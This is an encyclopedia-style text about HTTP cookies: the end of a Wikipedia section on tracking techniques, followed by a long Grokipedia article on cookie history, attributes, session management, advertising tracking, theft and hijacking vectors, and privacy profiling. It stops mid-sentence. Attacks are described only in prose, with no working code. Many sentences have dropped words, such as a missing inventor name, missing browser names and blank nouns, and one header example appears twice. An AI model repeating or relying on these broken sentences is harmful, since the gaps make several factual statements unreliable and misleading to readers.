This approach presents two advantages from the point of view of the tracker. First, having the tracking information placed in the HTTP request body rather than in the URL means it will not be noticed by the average user. Second, the session information is not copied when the user copies the URL (to bookmark the page or send it via email, for example).

window.name DOM property

[edit]

All current web browsers can store a fairly large amount of data (2–32 MB) via JavaScript using the DOM property window.name. This data can be used instead of session cookies. The technique can be coupled with JSON/JavaScript objects to store complex sets of session variables on the client side.

The downside is that every separate window or tab will initially have an empty window.name property when opened.

In some respects, this can be more secure than cookies because its contents are not automatically sent to the server on every request like cookies are, so it is not vulnerable to network cookie sniffing attacks.

Tracking

[edit]

IP address

[edit]

Some users may be tracked based on the IP address of the computer requesting the page. The server knows the IP address of the computer running the browser (or the proxy, if any is used) and could theoretically link a user's session to this IP address.

However, IP addresses are generally not a reliable way to track a session or identify a user. Many computers designed to be used by a single user, such as office PCs or home PCs, are behind a network address translator (NAT). This means that several PCs will share a public IP address. Furthermore, some systems, such as Tor, are designed to retain Internet anonymity, rendering tracking by IP address impractical, impossible, or a security risk.

ETag

[edit]

Because ETags are cached by the browser, and returned with subsequent requests for the same resource, a tracking server can simply repeat any ETag received from the browser to ensure an assigned ETag persists indefinitely (in a similar way to persistent cookies). Additional caching header fields can also enhance the preservation of ETag data.

ETags can be flushed in some browsers by clearing the browser cache.

Browser cache

[edit]

The browser cache can also be used to store information that can be used to track individual users. This technique takes advantage of the fact that the web browser will use resources stored within the cache instead of downloading them from the website when it determines that the cache already has the most up-to-date version of the resource.

For example, a website could serve a JavaScript file with code that sets a unique identifier for the user (for example, var userId = 3243242;). After the user's initial visit, every time the user accesses the page, this file will be loaded from the cache instead of downloaded from the server. Thus, its content will never change.

Browser fingerprint

[edit]

A browser fingerprint is information collected about a browser's configuration, such as version number, screen resolution, and operating system, for the purpose of identification. Fingerprints can be used to fully or partially identify individual users or devices even when cookies are turned off.

Basic web browser configuration information has long been collected by web analytics services in an effort to accurately measure real human web traffic and discount various forms of click fraud. With the assistance of client-side scripting languages, collection of much more esoteric parameters is possible.[100][101] Assimilation of such information into a single string constitutes a device fingerprint. In 2010, EFF measured at least 18.1 bits of entropy possible from browser fingerprinting.[102] Canvas fingerprinting, a more recent technique, claims to add another 5.7 bits.

Web storage

[edit]

Some web browsers support persistence mechanisms which allow the page to store the information locally for later use.

The HTML5 standard (which most modern web browsers support to some extent) includes a JavaScript API called Web storage that allows two types of storage: local storage and session storage. Local storage behaves similarly to persistent cookies while session storage behaves similarly to session cookies, except that session storage is tied to an individual tab/window's lifetime (AKA a page session), not to a whole browser session like session cookies.[103]

Internet Explorer supports persistent information[104] in the browser's history, in the browser's favorites, in an XML store ("user data"), or directly within a web page saved to disk.

Some web browser plugins include persistence mechanisms as well. For example, Adobe Flash has Local shared object and Microsoft Silverlight has Isolated storage.[105]

See also

[edit]

References

[edit]
[edit]
Revisions and contributorsEdit on WikipediaRead on Wikipedia
from Grokipedia
An HTTP cookie is a mechanism that allows an HTTP server to store stateful information, in the form of name-value pairs known as cookies, on the client-side HTTP such as a . The server sets cookies via the Set-Cookie response header, and the user agent returns them in the Cookie request header for subsequent requests to the same site, thereby enabling persistence of data like session identifiers or user preferences across stateless HTTP transactions. Developed in 1994 by , a programmer at Communications Corporation, HTTP cookies originated as a solution to maintain contents in early applications, where the stateless nature of HTTP otherwise required users to reselect items on each page navigation. Standardized in RFC 6265 by the (IETF) in 2011, cookies support attributes for expiration, (e.g., Secure and HttpOnly flags to mitigate interception and scripting attacks), and scoping to domains or paths, facilitating uses such as user , site , and behavioral tracking. While essential for functional web experiences, HTTP cookies have sparked controversies over and , particularly third-party cookies embedded in advertisements or scripts that enable cross-site user profiling without explicit , leading to exploits like cookie via network sniffing or and regulatory responses including consent requirements under frameworks like the EU's . Major browsers have since implemented controls, such as blocking third-party cookies by default in and , with planning deprecation amid ongoing debates over alternatives like that preserve some tracking capabilities under veneers.

Definition and Fundamentals

Purpose and Core Mechanism

The HTTP protocol operates in a stateless manner, meaning each client request to a server is treated independently without inherent of prior interactions. HTTP cookies address this limitation by enabling servers to store small amounts of stateful data on the client device, which the client then returns in subsequent requests to the same server, thereby simulating continuity across sessions. This mechanism supports functions such as user , session tracking, and preference storage without requiring persistent server-side storage for every user. In the core exchange process, a server initiates cookie creation by including a Set-Cookie header field in its HTTP response to a client request. The header specifies a cookie as a name-value pair, optionally accompanied by attributes like Domain, Path, Expires, Max-Age, Secure, and HttpOnly, which dictate storage conditions, transmission rules, and accessibility. Upon receipt, the client (typically a web browser) evaluates these attributes against its policies and, if compliant, stores the cookie locally, often in memory or on disk depending on persistence directives. For retrieval, the client automatically appends a Cookie header to outgoing requests matching the cookie's domain and path criteria, containing the relevant name-value pairs separated by semicolons. The server then inspects this header to reconstruct session state or user context, enabling personalized responses without embedding data in URLs or requiring client-side scripting for basic persistence. This bidirectional header-based transmission ensures cookies remain opaque to the while facilitating efficient state management, though clients may reject or ignore cookies based on user-configured privacy settings or regulatory compliance.

Data Structure and Transmission

HTTP cookies are transmitted between web servers and user agents primarily through specialized HTTP header fields. Servers instruct user agents to store cookies using the Set-Cookie response header field, which conveys a cookie-name paired with a cookie-value, optionally accompanied by attributes that govern the cookie's scope, persistence, and security properties. The Set-Cookie header adheres to the syntax cookie-name=VALUE [; cookie-av], where VALUE is an opaque string not containing prohibited characters such as semicolons, commas, or control characters, and cookie-av represents attribute-value pairs separated by semicolons. Multiple Set-Cookie headers can appear in a single response to set multiple cookies. Key attributes in the Set-Cookie header define the cookie's behavior:
AttributeDescriptionExample
DomainSpecifies the hosts to which the cookie applies; if omitted, defaults to the host of the request URI without subdomains.Domain=example.com
PathDefines the URI path prefix for which the cookie is valid; defaults to the path of the request URI.Path=/docs
ExpiresSets an absolute expiration date and time in HTTP-date format after which the cookie should be discarded.Expires=Wed, 21 Oct 2025 07:28:00 GMT
Max-AgeSpecifies the maximum age in seconds for the cookie's persistence; takes precedence over Expires if both are present.Max-Age=3600
SecureIndicates the cookie should only be transmitted over secure (HTTPS) connections.Secure
HttpOnlyPrevents client-side scripts from accessing the cookie, mitigating cross-site scripting risks.HttpOnly
User agents parse and store cookies based on these attributes, rejecting invalid ones such as those with mismatched domains or malformed dates. Upon subsequent HTTP requests to matching hosts and paths, the transmits stored back to the server via the Cookie request header field. The Cookie header lists relevant as cookie-name=VALUE pairs separated by semicolons, ordered arbitrarily but consistently by the . For example, a request might include Cookie: sessionid=abc123; preference=dark. Only that satisfy the domain, path, and secure attributes are included; session (lacking Expires or Max-Age) are discarded upon session termination, typically browser closure. This bidirectional transmission enables stateless HTTP to maintain state across requests.

Historical Development

Invention by Lou Montulli

Lou Montulli, a software engineer at Netscape Communications Corporation, invented the HTTP cookie in June 1994 to address the stateless nature of the Hypertext Transfer Protocol (HTTP), which prevented web servers from maintaining user session information across multiple requests. This limitation hindered the development of interactive web applications, such as online shopping carts that required remembering user selections. Montulli, then 23 years old, devised the mechanism during discussions about enhancing Netscape's shopping server capabilities, collaborating with engineer John Giannandrea to draft an initial specification. The cookie allowed servers to send a small packet of data—typically a unique identifier—to the client's browser, which would store and return it in subsequent requests to the same domain, enabling site-specific state management without broader cross-site tracking. The term "cookie" drew from the concept of a "," a term used in for opaque data packets exchanged between processes. Montulli's design emphasized to preserve user anonymity, intending the technology primarily for functional purposes like session persistence and on individual websites rather than pervasive surveillance. The feature was first implemented in the version 0.9 beta, released on October 13, 1994, and its inaugural deployment occurred on Netscape's own website to distinguish first-time visitors from returning ones. Montulli filed a for the cookie mechanism in 1995, which the U.S. Patent and Trademark granted as U.S. 5,774,670 in 1998, covering the method of embedding state information in HTTP headers. This invention laid the groundwork for persistent web interactivity, though its later adaptations for advertising raised privacy concerns unforeseen at the time of creation.

Early Adoption and Standardization

HTTP cookies saw initial implementation in version 0.9 beta, released on October 13, 1994, marking the first public browser support for the technology originally developed by to maintain state across stateless HTTP requests, such as for tracking contents on Netscape's own online store. This proprietary feature quickly proved essential for early and session management, as the web's growth demanded mechanisms beyond basic HTTP's limitations. Adoption accelerated with Microsoft's inclusion of cookie support in 2.0, launched in November 1995, which mirrored Netscape's approach and spurred competitive browser development amid the . By the mid-1990s, cookies had become a in major browsers, enabling websites to store user-specific data like preferences and login states, though implementations varied slightly between vendors, leading to interoperability concerns. The (IETF) initiated formal standardization to address these discrepancies and define cookie semantics more rigorously; RFC 2109, titled "HTTP Mechanism," was published in February 1997, specifying the Set-Cookie response header for servers to set cookies and the Cookie request header for clients to return them, while introducing attributes like expiration times and paths for finer control. This document aimed to supersede Netscape's original draft but retained , though it faced limited adoption due to browser vendors' reluctance to break existing sites. Subsequent refinements addressed shortcomings in RFC 2109, such as ambiguous parsing rules and security gaps; RFC 2965, released in October 2000, introduced versioned cookies () with enhanced domain matching and discard attributes to mitigate unintended sharing, though it saw minimal browser implementation in favor of the simpler Netscape/ RFC 2109 format. These early standards laid the groundwork for cookies' ubiquity, with over 90% of websites employing them by the early 2000s for and tracking, despite emerging debates that highlighted the technology's potential for cross-site data correlation without explicit user consent. Standardization efforts underscored the tension between functional necessity and the risks of opaque state persistence, influencing later evolutions toward attributes like Secure and HttpOnly for improved security.

Session and Persistent Cookies

Session cookies, also referred to as temporary or in-memory cookies, are HTTP cookies transmitted without an Expires or Max-Age attribute in the Set-Cookie header, causing the to delete them automatically upon termination of the browsing session—typically when the browser or its associated tabs are closed. This behavior ensures that session cookies maintain state only for the duration of a single user interaction with a , such as tracking items in a or preserving form data across pages without requiring persistent storage. Unlike persistent variants, session cookies reside solely in the browser's RAM and are never written to disk, minimizing long-term and reducing exposure to forensic analysis or unauthorized access via inspection. Persistent cookies, in contrast, incorporate an Expires attribute (specifying an absolute date and time in HTTP-date format) or a Max-Age attribute (indicating a relative lifetime in seconds), enabling the to store them on the client's persistent storage, such as the hard disk, until the designated expiration elapses or the cookie is manually deleted. This persistence allows websites to recall user-specific data across multiple browsing sessions, facilitating features like "remember me" functionality, where a cookie might store an encrypted token valid for 30 days or longer, or site preferences such as language settings retained indefinitely unless overridden. The Max-Age directive, introduced for greater precision in RFC 6265 (published April 2011), supersedes Expires in cases of conflict and supports negative values to emulate session cookie behavior, though user agents treat absent attributes as non-persistent by default. The distinction arises from the stateless nature of HTTP, where provide a mechanism to associate client-side state with server requests; session cookies suffice for ephemeral needs, avoiding unnecessary disk writes and potential leaks from residual files, while persistent cookies enable efficiency by reducing repeated server queries but introduce risks like extended tracking if expiration dates are set excessively long (e.g., years). Both types are set via the Set-Cookie response header from the server and retrieved in the Cookie request header, but persistent cookies' disk storage makes them visible to browser inspection tools and subject to user deletion via , whereas session cookies evade such persistence unless the session is artificially prolonged. Empirical data from browser implementations, such as those in Chrome and , confirms that session cookies exhibit zero disk footprint post-closure, aligning with -focused designs that prioritize minimal .

Attribute-Based Types (Secure, HttpOnly, SameSite)

The Secure attribute specifies that the must transmit the cookie only over secure protocols, such as , thereby preventing its transmission over unencrypted HTTP connections and reducing the risk of interception by network attackers. This attribute does not encrypt the cookie's contents but ensures it is withheld from insecure channels, as defined in the HTTP mechanism standardized in RFC 6265 (April 2011). Servers set it via the Set-Cookie header, e.g., Set-Cookie: sessionId=abc123; Secure, and user agents like browsers enforce it by omitting the cookie in HTTP requests. The HttpOnly attribute restricts client-side scripts, such as via document.cookie, from accessing the cookie, thereby mitigating (XSS) attacks where malicious scripts could exfiltrate sensitive data like session tokens. Introduced by in Service Pack 1 in 2002, it was later incorporated into RFC 6265 to standardize its behavior across user agents. Despite this protection against script-based theft, HttpOnly cookies remain vulnerable to network-level attacks or server-side compromises, as they are still sent in HTTP requests. It is set similarly in the Set-Cookie header, e.g., Set-Cookie: sessionId=abc123; HttpOnly, and is independent of the Secure attribute, allowing combined use for layered defenses. The SameSite attribute controls whether the cookie is included in cross-site requests, addressing (CSRF) by defaulting to withholding cookies from requests initiated by third-party sites unless explicitly allowed. Proposed by engineer Mike West and introduced in Chrome 51 in 2016, it gained broader adoption following Chrome's enforcement changes in version 80 (February 2020), which treated unset SameSite as "Lax" and required SameSite=None cookies to also specify Secure for cross-site use. Values include Strict (no cross-site inclusion, even for top-level navigations), Lax (allows safe methods like GET for top-level actions), and None (permits cross-site but mandates Secure), as specified in the updated cookie semantics of RFC 6265bis drafts. This mitigates CSRF without fully blocking legitimate cross-site interactions, though it can break embedded content like iframes if misconfigured.

Advanced or Problematic Variants (Third-Party, Supercookies, Zombie Cookies)

Third-party cookies are HTTP cookies set by a domain other than the one the user is directly visiting, typically through embedded content such as advertisements, analytics scripts, or social media widgets loaded from external servers. These cookies enable cross-site tracking by associating user activity across multiple websites sharing the same third-party domain, facilitating behavioral profiling for targeted advertising without explicit user consent in many cases. For instance, an advertising network can set a cookie via an ad iframe on a news site and later retrieve it on an e-commerce platform to infer user interests. While not inherently malicious, third-party cookies raise significant privacy concerns due to their role in pervasive surveillance, prompting browser vendors to implement blocking mechanisms, such as default disabling in Safari and Firefox since 2020 and partial phases in Chrome. Supercookies refer to resilient tracking mechanisms that persist beyond standard cookie deletion, often leveraging non-cookie storage like HTTP headers, browser caches, or network-level identifiers rather than traditional browser cookie jars. One common implementation involves embedding a unique identifier in HTTP response headers, such as ETags or server-specified headers, which browsers cache and resend, allowing identification even if cookies are cleared. Internet service providers have historically used supercookies by inserting persistent IDs into traffic headers for network optimization or , as documented in cases like Verizon's X-UIDH header in , which tracked users across unaffiliated sites until public backlash and removal. These variants evade typical tools because they operate outside browser storage, complicating detection and blocking, though modern browsers like version 85 introduced partitioning to limit cache-based supercookie effectiveness across sites. Zombie cookies, also known as evercookies, are advanced persistent identifiers that automatically regenerate after deletion by exploiting multiple redundant storage mechanisms on the client device. They function by initially setting in browser cookies and simultaneously in alternative locations such as localStorage, IndexedDB, HSTS cache, or even plugin like Flash Local Shared Objects, then using to detect deletions and restore the original value from backups. This resurrection technique ensures continuity of tracking IDs, enabling long-term user profiling resistant to standard clearing methods, as demonstrated in proof-of-concept implementations that achieve near-indefinite persistence unless all storage vectors are comprehensively purged. implications include heightened risks of unauthorized , prompting recommendations for users to employ browser extensions, VPNs with tracking prevention, or full device wipes, though no universal regulatory ban exists, with mitigation relying on evolving browser defenses and user vigilance.

Practical Applications

Enabling Session Management

HTTP is inherently stateless, with each request-response pair independent of prior interactions, necessitating mechanisms to maintain continuity for user sessions across multiple requests. Cookies address this by enabling servers to store a session identifier on the client device, which links to server-side data representing the user's session state. Upon session initiation, such as user authentication, the server generates a unique session ID—often a random, cryptographically secure string—and transmits it to the client via the Set-Cookie header in the HTTP response, for example: Set-Cookie: sessionid=abc123; Path=/; Secure; HttpOnly. The client stores this cookie and includes it in subsequent requests to the same domain using the Cookie header, such as Cookie: sessionid=abc123, allowing the server to map the ID to the relevant session data. This exchange, defined in RFC 6265, ensures efficient state persistence without embedding sensitive data directly in the cookie. Session cookies, distinguished by the absence of an explicit Expires or Max-Age attribute, remain valid only for the duration of the browser session and are automatically discarded upon browser closure, minimizing long-term storage risks. Servers typically implement prevention by regenerating IDs post-authentication and enforce timeouts to invalidate stale sessions, enhancing security in this mechanism.

Personalization and E-commerce Functionality

HTTP cookies facilitate website by storing user-specific preferences, such as selected , theme, or text size, enabling servers to retrieve and apply these settings upon subsequent visits without requiring re-entry. Functional cookies, a subtype often persistent, maintain these choices across sessions, enhancing by avoiding repetitive configurations. For instance, if a user selects a dark mode interface, the cookie signals the server to render pages accordingly, reducing and improving for that individual. In content delivery, cookies enable tailored recommendations by linking user interactions—such as viewed pages or searched terms—to a , allowing algorithms to infer interests and prioritize relevant material. This process relies on first-party cookies set by the domain itself, which store data like browsing history summaries to generate suggestions without invasive cross-site tracking. Empirical evidence from shows that such increases engagement; for example, sites using cookie-based preference matching report higher return visit rates compared to stateless alternatives. For , cookies underpin core functionalities like shopping cart persistence, where session cookies track temporarily selected items during a browsing visit, ensuring the cart remains intact across subpages without database queries per navigation. Persistent cookies extend this by preserving cart contents or wishlists beyond session closure, permitting users to resume abandoned purchases upon return, which mitigates cart abandonment rates estimated at 70% in online retail. Additionally, cookies store order history or data, feeding into recommendation engines that suggest complementary products based on prior transactions, directly correlating with uplift in average order value through causal links in user behavior retention. Without cookies, e-commerce platforms would revert to stateless , necessitating full cart reconstruction per visit and eroding conversion efficiency.

Behavioral Tracking for Advertising

Behavioral tracking for advertising relies primarily on third-party HTTP to monitor user activities across multiple websites, enabling advertisers to construct detailed profiles of individual habits and preferences. These are set by ad networks or providers embedded via scripts or ad tags on diverse sites, assigning a to the user's browser that persists across domains. By correlating this identifier with observed behaviors—such as pages visited, time spent, and interactions—advertisers aggregate data to infer interests, demographics, and purchase intent, facilitating targeted ad delivery. The mechanism begins when a user loads a webpage containing third-party content, like a banner ad or tracking pixel from an external domain; the server responds with a Set-Cookie header embedding the identifier alongside timestamps or event . Subsequent visits to other sites with the same third-party elements retrieve and update the , building a longitudinal record of cross-site activity. Techniques such as retargeting display ads for previously viewed products, while frequency capping limits ad exposures to avoid user , all dependent on this persistent tracking. cookies, the most prevalent type of third-party cookies, dominate this , powering behavioral targeting that matches users to relevant campaigns based on inferred profiles. Introduced shortly after HTTP cookies' invention in 1994 by Netscape engineers, third-party cookie tracking gained prominence in the late 1990s with the rise of ad networks like DoubleClick, which leveraged them for cross-site personalization and measurement. By enabling audience segmentation and real-time bidding in programmatic advertising, these cookies have underpinned the growth of digital ad markets, with usage in over 78% of U.S. programmatic ad buys as of November 2023. Globally, more than 40% of websites deploy cookies for such purposes, underscoring their integral role in generating targeted ad revenue estimated to constitute a significant portion of online advertising economics. This tracking extends to advanced applications like visitor profiling for data trading among brokers and integration with for attribution modeling, where cookies link user actions to conversion events across sessions. However, reliance on third-party cookies exposes advertising efficacy to browser restrictions, as evidenced by projections of 20-30% revenue losses for publishers upon their without viable alternatives. Empirical from ad ecosystems confirms that sites employing tracking cookies achieve approximately 4% higher revenue compared to those without, highlighting the causal link between cookie-enabled targeting and monetization outcomes.

Technical Implementation

Setting and Retrieving Cookies

HTTP servers set cookies by including one or more Set-Cookie header fields in the response to an HTTP request. Each Set-Cookie header specifies a cookie as a name-value pair, optionally followed by attributes such as Expires, Max-Age, Domain, Path, Secure, and HttpOnly, which dictate storage, transmission, and expiration rules. For example, a server might respond with:

HTTP/1.1 200 OK Set-Cookie: sessionId=abc123; Expires=Wed, 26 Oct 2025 10:00:00 GMT; Path=/; Secure; HttpOnly

HTTP/1.1 200 OK Set-Cookie: sessionId=abc123; Expires=Wed, 26 Oct 2025 10:00:00 GMT; Path=/; Secure; HttpOnly

Upon receiving this, the (typically a ) parses the header and, if the cookie meets acceptance criteria (e.g., valid syntax, non-blocked domain), stores it locally in its , often as a file or in-memory structure keyed by domain and path. Browsers may reject or ignore Set-Cookie headers based on policies, such as exceeding per-domain limits (e.g., 50 cookies per domain in many implementations) or that block third-party cookies. To retrieve cookies, the browser automatically includes a Cookie request header in subsequent HTTP requests to matching origins, listing relevant stored cookies as semicolon-separated name-value pairs without attributes. Matching is determined by the request URI against the cookie's Domain and Path attributes; for instance, a cookie with Path=/ applies to all paths on the domain, while Secure restricts it to HTTPS. The request header might appear as:

GET /profile HTTP/1.1 Host: example.com Cookie: sessionId=abc123; preference=dark

GET /profile HTTP/1.1 Host: example.com Cookie: sessionId=abc123; preference=dark

The server then parses the Cookie header to access values for , such as authenticating sessions or personalizing responses. If multiple cookies share names, browsers typically send the most recent or evict older ones per storage rules, ensuring the server receives the intended values. This exchange relies on stateless HTTP, where cookies bridge requests without server-side storage for each client. Standardized in RFC 6265 (published April 2011), the mechanism supports multiple per response but limits transmission to avoid header bloat, with user agents sorting and filtering to prioritize relevant ones. can also manipulate cookies via document.cookie, but server-set headers override or complement this for HTTP transmission.

Key Attributes and Their Functions

HTTP cookies are defined through the Set-Cookie header in server responses, consisting of a name-value pair and optional attributes that govern their scope, , transmission conditions, and accessibility. The name identifies the cookie uniquely within its domain and path, while the value stores the actual data, typically limited to 4KB in total per cookie across implementations. The Domain attribute specifies the hosts to which the cookie applies, allowing it to be shared across subdomains if prefixed with a dot (e.g., .example.com), but restricted to the exact host if omitted; this prevents unintended cross-domain exposure while enabling site-wide . Without it, the cookie defaults to the originating server's , excluding subdomains. The Path attribute delimits the URI paths under the domain where the cookie is valid, defaulting to the request URI's path if unspecified; it ensures cookies are sent only for relevant site sections, reducing unnecessary transmissions and enhancing granularity in . Persistence is controlled by Expires or Max-Age attributes: Expires sets an absolute UTC date-time for deletion, while Max-Age defines seconds from set time, overriding Expires if both present; absence results in a session discarded at browser close, balancing temporary state with long-term storage needs. The Secure flag mandates transmission only over encrypted connections, mitigating interception risks on untrusted networks without affecting HTTP fallback. HttpOnly prevents JavaScript access via document.cookie, blocking client-side extraction and thereby thwarting (XSS) attacks that could exfiltrate sensitive data. The SameSite attribute regulates cross-site request inclusion: Strict blocks all cross-site, Lax permits safe top-level methods like GET, and None allows all but requires Secure; introduced to curb (CSRF), it defaults variably by browser but enhances default protection against unauthorized actions.

Browser and Client-Side Handling

Default Processing and Storage

Upon receiving an HTTP response containing a Set-Cookie header, web browsers parse the header fields according to the algorithm outlined in RFC 6265, extracting the cookie name-value pair and any attributes separated by semicolons. The parsing ignores malformed elements permissively to ensure compatibility, processing attributes case-insensitively. If the Domain attribute is absent, the cookie's domain defaults to the host of the originating request, preventing automatic subdomain sharing. Similarly, without a Path attribute, the path defaults to the directory portion of the request URI (e.g., /foo/ for a request to /foo/bar.html). Absence of Max-Age or Expires attributes results in a session cookie, which persists only until the browser session ends. The browser then stores the parsed in its internal cookie store, recording fields such as name, value, domain, path, expiry time (if persistent), creation time, last-access time, and flags indicating , host-only scope, secure transmission requirements, and HttpOnly status. Before storage, the browser evicts any expired from the store and may discard least-recently used ones if limits are exceeded, with minimum capacities of 4096 bytes per , 50 per domain, and 3000 total. Persistent are saved to durable mechanisms like databases—for instance, and store them in encrypted files within user profile directories, while session are flagged for in-memory retention or automatic deletion upon browser closure. For outgoing requests, browsers default to including matching cookies in the Cookie request header, filtering by domain match (exact or superdomain per public suffix rules), path prefix match, non-expired status, and flag compliance (e.g., secure cookies only over ). Selected cookies are serialized into a single header value, sorted first by descending path length and then by ascending creation time to resolve ties, ensuring deterministic transmission without user intervention unless privacy settings alter defaults. This process applies to first-party contexts by default, with third-party inclusions varying by browser policies but enabled in standard configurations for legacy compatibility.

User Controls and Blocking Mechanisms

Web browsers incorporate built-in settings allowing users to manage HTTP by blocking them entirely, restricting third-party , or configuring exceptions on a per-site basis. For example, enables users to block third-party via the and section in settings, which prevents set by domains other than the visited site from being stored or sent. Firefox provides options to block and site data from specific websites through the Page Info dialog or enhanced tracking protection settings, which can limit cross-site tracking by default. Apple similarly offers toggles under to prevent cross-site tracking and block all , with granular controls for individual sites. These mechanisms operate by instructing the browser to reject cookie-setting headers (Set-Cookie) or discard them upon receipt, though blocking all can impair site functionality such as login persistence or shopping carts. Private or incognito browsing modes in major browsers provide temporary cookie isolation, where cookies are stored only for the duration of the session and automatically deleted upon closure, preventing long-term persistence across sessions. In Chrome's Incognito mode, for instance, third-party cookies are blocked by default, and all data is discarded at exit, reducing tracking continuity without affecting normal browsing profiles. Private Browsing and Private mode employ similar session-scoped storage, ensuring cookies do not survive tab or window closure. This approach does not eliminate cookies during the session but limits their forensic value for profiling, as evidenced by reduced cookie counts in session logs compared to standard modes. Browser extensions extend user control by automating cookie rejection, particularly for tracking purposes. Tools like learn from browsing patterns to block third-party trackers that attempt to set cookies without user interaction, focusing on entities violating heuristics for hidden tracking. and similar ad blockers identify and suppress cookie-based trackers, often integrating with content filters to prevent banner prompts while enforcing blocks. Extensions such as Disable Cookies or I Don't Care About Cookies allow one-click toggling of all cookies on the current site or auto-rejection of non-essential ones, bypassing manual settings for efficiency. These add-ons operate via content scripts that intercept Set-Cookie responses or modify HTTP requests, though their efficacy depends on timely updates to evade tracker evasions like fingerprinting. The Do Not Track (DNT) HTTP header, enabled in browser settings, sends a signal (DNT: 1) requesting sites refrain from behavioral tracking via cookies, but its effectiveness remains limited due to voluntary compliance and widespread non-adherence by advertisers. Proposed in 2011 and supported in browsers like Firefox and Chrome (though Chrome disabled it by default in 2018), DNT lacks legal enforcement, with studies showing minimal reduction in tracking behaviors—often less than 20% in cookie deployment— as sites prioritize revenue over signals. Users can also manually clear stored cookies through browser interfaces, such as developer tools where users navigate to the Application or Storage tab, select a specific domain under Cookies, and delete individual or all entries for that domain, or via site settings that list and delete cookies by origin to reset tracking states; if cookies may have been compromised, logging out from associated sites and changing passwords is recommended for security. Regulatory frameworks indirectly bolster user controls by mandating site-side consent mechanisms, such as GDPR's requirement for explicit opt-in to non-essential , which browsers can complement through blocking defaults. However, primary blocking relies on browser implementations rather than laws, with no universal federal mandate in regions like the , leaving efficacy to user configuration and tool adoption. Empirical data from audits indicate that combining browser blocks with extensions reduces third-party loads by up to 90% on average, though sites increasingly shift to alternatives like local storage when fail.

Security Vulnerabilities

Common Attack Vectors (Theft, Hijacking)

HTTP cookies, particularly session cookies, are prime targets for due to their role in maintaining authenticated states, enabling attackers to hijack sessions by replaying stolen values. Cookie theft involves unauthorized capture of cookie data, while hijacking entails using that data to impersonate the legitimate user, often termed "pass-the-cookie" attacks. Without protective attributes like Secure and HttpOnly flags, cookies transmitted over unencrypted channels or accessible via client-side scripts become vulnerable. One prevalent vector is cross-site scripting (XSS), where attackers inject malicious scripts into web pages viewed by victims, allowing execution in the browser context to access and exfiltrate non-HttpOnly cookies via document.cookie. Reflected, stored, or DOM-based XSS variants facilitate this; for instance, an attacker might embed a script that beacons cookie data to a remote server. OWASP identifies XSS as a core mechanism for cookie theft, noting that absent input sanitization and output encoding, even trusted sites can propagate payloads. Man-in-the-middle (MITM) attacks exploit unencrypted HTTP connections, intercepting traffic on insecure networks like public to capture Cookie headers in requests or Set-Cookie in responses. Tools such as enable packet sniffing, revealing session identifiers if the Secure flag is absent, which restricts transmission to . Adversary-in-the-middle variants, using reverse proxies like Evilginx, extend this by victims into authenticating through attacker-controlled proxies, yielding post-login cookies that bypass (MFA). The FBI reported in October 2024 that cybercriminals increasingly steal such cookies to access accounts undetected by MFA. Malware and phishing constitute direct client-side theft vectors, with trojans dumping browser storage or process memory to extract cookies, or sites prompting cookie export. Browser extensions, if malicious, can similarly access storage APIs. ATT&CK documents this as adversaries leveraging for session cookie exfiltration, enabling hijacking without network interception. Session sniffing, a of MITM, targets or to passively collect cookies in transit. Once obtained, stolen cookies facilitate hijacking by injection into the attacker's browser or requests, granting access to victim sessions until expiration or invalidation. This bypasses initial , exploiting the stateless nature of HTTP where servers validate cookies without re-verifying origins. Empirical cases, such as those involving MFA evasion, underscore the efficacy, with attackers maintaining across devices.

Defensive Measures and Best Practices

Developers mitigate cookie theft and primarily through standardized attributes in the Set-Cookie header. The HttpOnly attribute prevents client-side scripts from accessing the cookie via , thereby reducing exposure to (XSS) attacks that could otherwise exfiltrate cookie values. The Secure attribute ensures cookies are transmitted only over connections, blocking interception on unencrypted HTTP channels where attackers could perform man-in-the-middle (MITM) attacks to capture cookies. Combining these with the SameSite attribute—set to "Strict" to block cookies in all cross-site requests or "Lax" to allow only safe top-level navigations—counters (CSRF) by limiting cookies' inclusion in requests from external sites. Additional server-side practices include prefixing sensitive with __Secure- (requiring Secure and ) or __Host- (adding domain restrictions and prohibiting subdomains), which prevent overwriting by insecure or third-party sources. Sensitive data, such as tokens, should not be stored directly in ; instead, use opaque session IDs referencing server-side state to minimize breach impact if are compromised. Regenerating session identifiers upon or privilege changes, coupled with short expiration times (e.g., session-only that delete on browser close), limits the for exploitation post-theft. On the client side, browsers enforce these attributes by default in modern versions, but users can enhance protection by enabling third-party cookie blocking—available in settings like Chrome's "Block third-party cookies" or Firefox's Enhanced Tracking Protection—which curtails cross-domain tracking and potential hijacking vectors. Regularly clearing and site data, using modes that avoid persistent storage, and employing (MFA) provide further defenses, as MFA can detect anomalous sessions even if cookies are stolen. Web application firewalls (WAFs) and endpoint detection tools monitor for suspicious traffic patterns indicative of theft attempts, such as rapid session reuse from new IPs.
  • Implementation checklist for developers:
    • Mandate for all cookie-setting endpoints to enforce Secure.
    • Validate and regenerate sessions on re-authentication if hijacking is suspected.
    • Avoid JavaScript-based cookie manipulation for critical sessions; rely on HTTP headers.
These measures, when layered, address empirical vulnerabilities observed in breaches where unflaggged cookies enabled prolonged unauthorized access, though no single practice eliminates risks entirely without holistic security hygiene.

Privacy Implications

Tracking Capabilities and User Profiling

HTTP cookies, particularly third-party cookies, facilitate extensive user tracking by allowing entities other than the visited to store and retrieve on a user's browser. Third-party cookies are set by domains distinct from the primary site, often embedded via scripts from networks, providers, or social plugins, enabling the of user activity across multiple unrelated websites. This cross-site persistence assigns a unique pseudonymous identifier to the browser, which trackers append with behavioral such as pages viewed, time spent, and interactions, building a longitudinal record of online navigation independent of explicit logins. Cookies themselves do not store or reveal historical IP addresses, as they typically contain session identifiers, preferences, or tracking IDs rather than IP data. Servers independently capture and log the current IP address from each HTTP request. However, persistent cookies with unique identifiers allow websites to associate multiple IP addresses from different visits with the same user profile in server-side logs, enabling indirect tracking of IP changes over time, though this data remains server-stored and not exposed via the cookie. User profiling emerges from aggregating these tracked signals into inferred attributes, preferences, and demographics, primarily for behavioral . Advertisers leverage data to construct profiles encompassing interests (e.g., inferred from visited product pages or content categories), purchase (via cart abandons or search queries), and even socioeconomic indicators derived from site affinities. For instance, a from an ad tech firm might link visits to sports sites, aggregators, and s to profile a user as a "middle-income traveler interested in investments," triggering tailored ad auctions yielding higher bids from relevant campaigns. Empirical analyses confirm this efficacy: a study of web cookies found that third-party placements transmit substantial behavioral data, with top trackers like and dominating cross-domain footprints on over 90% of measured sites. The scale of such profiling underscores cookies' role in programmatic advertising ecosystems, where third-party identifiers underpin for ad impressions. As of Q3 2023, more than 75% of U.S. programmatic ad transactions across major industries relied on 